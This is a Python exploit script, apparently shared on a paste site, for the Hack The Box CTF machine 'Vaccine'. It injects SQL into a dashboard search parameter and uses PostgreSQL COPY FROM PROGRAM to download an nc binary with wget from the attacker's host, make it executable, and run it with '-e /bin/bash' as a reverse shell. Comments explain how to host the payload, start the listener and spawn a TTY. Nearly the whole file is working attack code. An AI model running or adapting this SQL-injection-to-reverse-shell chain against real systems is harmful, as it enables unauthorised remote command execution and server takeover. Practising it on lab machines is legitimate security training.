· 5 years ago · May 14, 2020, 08:36 PM
1import requests
2import random
3
4
5your_cookie="<SESSION_COOKIE>" #CHANGE ME !
6your_IP="<YOUR_IP>" #CHANGE ME !
7your_web_port="80" #CHANGE ME !
8your_nc_port_listener="4444" #CHANGE ME !
9your_nc_PATH="nc" #CHANGE ME ! --> The path to the nc executable inside your web server
10
11'''
12Autor: Florianges
13This script exploit the SQL injection in the CTF vaccine on HTB
14This script sends an nc executable to the server and runs it to generate a reverse shell
15You must start a web server to host the executable nc --> exemple : sudo python -m SimpleHTTPServer 80
16And you must run a nc listener --> exemple: nc -lvp 4444
17Then you can execute this script with python3
18Note: The nc executable hosted on your web server must be GNU nc (and therefore must not be nec from OpenBSD)
19'''
20
21
22nb_random = str(random.randint(1,100000))
23i=0
24
25cmd = ['DROP TABLE IF EXISTS cmd_'+nb_random,
26 'CREATE TABLE cmd_'+ nb_random +'(cmd_output text)',
27 'COPY cmd_'+ nb_random +' FROM PROGRAM \'wget -P /tmp/'+ nb_random +' http://'+ your_IP +':'+ your_web_port +'/'+ your_nc_PATH + '\'',
28 'COPY cmd_'+ nb_random +' FROM PROGRAM \'chmod 777 /tmp/'+ nb_random +'/nc\'',
29 'COPY cmd_'+ nb_random +' FROM PROGRAM \'/tmp/' + nb_random +'/nc '+ your_IP +' ' + your_nc_port_listener +' -e /bin/bash\'']
30
31while (i<=len(cmd)-1):
32 url = "http://10.10.10.46/dashboard.php?search=a';"+ cmd[i] +"; -- -"
33 cookies = {'PHPSESSID': your_cookie}
34 print("Payload --> " + url)
35 if(i==4):
36 print("All the payload is send, check your nc processus")
37 print("You can spawn tty with this command: SHELL=/bin/bash script -q /dev/null")
38 page = requests.get(url,cookies=cookies)
39 i=i+1